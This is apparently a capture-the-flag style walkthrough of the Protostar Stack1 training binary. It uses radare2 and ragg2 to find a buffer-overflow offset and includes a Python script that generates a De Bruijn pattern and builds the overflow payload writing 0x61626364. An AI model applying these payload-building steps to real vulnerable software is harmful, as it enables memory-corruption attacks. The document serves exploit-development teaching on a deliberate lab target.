2017, Dec 18

Exploiting Protostar Stack1

You can check previous problems here:

Problem source code

We will work through this problem as if we did not have the C source code, using only the binary.

As you can see from the binary information above, our binary is a 32-bit ELF file, not stripped, and it is not protected by stack canaries, PIC/PIE, NX or RELRO.

Let’s have a look at what’s happening inside the app.

We will start the app inside Radare2 and have a look in Visual Mode to understand how it works.

So this is the key line: cmp eax, 0x61626364. eax is loaded from the local variable modified on the stack right before this compare, so our main goal is to get 0x61626364 into that variable, and hence into eax, by overflowing the buffer that sits just below it on the stack.

Now we’ll use a tool from radare’s framework called ragg2 (ragg2 -P <length> -r), which generates a cyclic pattern called a De Bruijn sequence: every 4-byte window in it is unique, so whatever 4 bytes end up in eax tell us the exact offset at which our payload overwrites the variable (radare2’s wopO command does this lookup).

• ood `!cat payload.txt` : reopen the binary in debugger mode, passing the contents of payload.txt (our cyclic pattern) as the program argument. In radare2 the backticks substitute the output of the inner command, and ! runs a shell command.

In visual mode you can step through the program one instruction at a time with S (step over) until you reach the instruction before cmp eax, 0x61626364; the value in eax at that point is four bytes of our pattern, which gives us the offset.

Now let’s rewrite our payload and exploit the binary. Notice that we are working on a little-endian machine, so 0x61626364 has to be written into the payload as \x64\x63\x62\x61 (the bytes reversed).
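As an added worked example (not code from the original write-up), here is a Python script that does the same two things the radare2 commands above do: it generates a De Bruijn cyclic pattern like ragg2 -P, maps the value that lands in eax back to an offset like wopO, and then builds the final payload with 0x61626364 in little-endian byte order. The eax value used in the demo (0x41414151) and the resulting offset are assumptions for illustration; in practice the value is read from the register in the debugger just before the cmp.

```python
#!/usr/bin/env python3
"""Added example (not from the original write-up): generate a De Bruijn pattern,
recover the overflow offset from the value that lands in eax, and build the
final Stack1 payload with 0x61626364 in little-endian byte order."""
import struct

# Letters and digits used for the cyclic pattern.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
TARGET = 0x61626364          # the constant in `cmp eax, 0x61626364`


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield a De Bruijn sequence B(k, n) over `alphabet` one character at a time.

    Every window of `n` characters occurs exactly once, so any 4 bytes that
    land in a register identify a unique offset in the pattern.  This is the
    FKM (Fredricksen-Kessler-Maiorana) construction; using a generator lets us
    stop as soon as we have enough bytes instead of building all k**n of them."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length):
    """Return the first `length` bytes of the pattern (the payload.txt contents)."""
    out = bytearray()
    for ch in de_bruijn():
        if len(out) == length:
            break
        out.append(ord(ch))
    return bytes(out)


def find_offset(pattern, eax_value):
    """Map the 32-bit value seen in eax back to an offset in `pattern`.

    eax holds 4 pattern bytes as a little-endian integer, so pack it back into
    bytes (<I) and search.  Returns -1 if eax did not come from the pattern
    at all (e.g. the pattern was too short to reach the variable)."""
    needle = struct.pack("<I", eax_value)
    return pattern.find(needle)


def build_payload(offset, value=TARGET):
    """Pad up to `offset`, then append `value` in little-endian order (\\x64\\x63\\x62\\x61)."""
    payload = b"A" * offset + struct.pack("<I", value)
    # The payload travels through argv and strcpy, both of which stop at a NUL byte,
    # so a target value containing 0x00 could not be delivered this way.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; argv/strcpy would truncate it")
    return payload


if __name__ == "__main__":
    pattern = cyclic(100)
    print(pattern.decode())
    # Assumed for illustration: the eax value observed before the cmp.  With
    # this alphabet the bytes "QAAA" sit at offset 64 of the pattern.
    leaked_eax = 0x41414151
    off = find_offset(pattern, leaked_eax)
    print("offset:", off)
    print("payload:", build_payload(off))
```

Run it once to write the pattern into payload.txt, read eax in the debugger, then call find_offset with that value and feed build_payload's output to the binary as its argument.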

And we did it ;)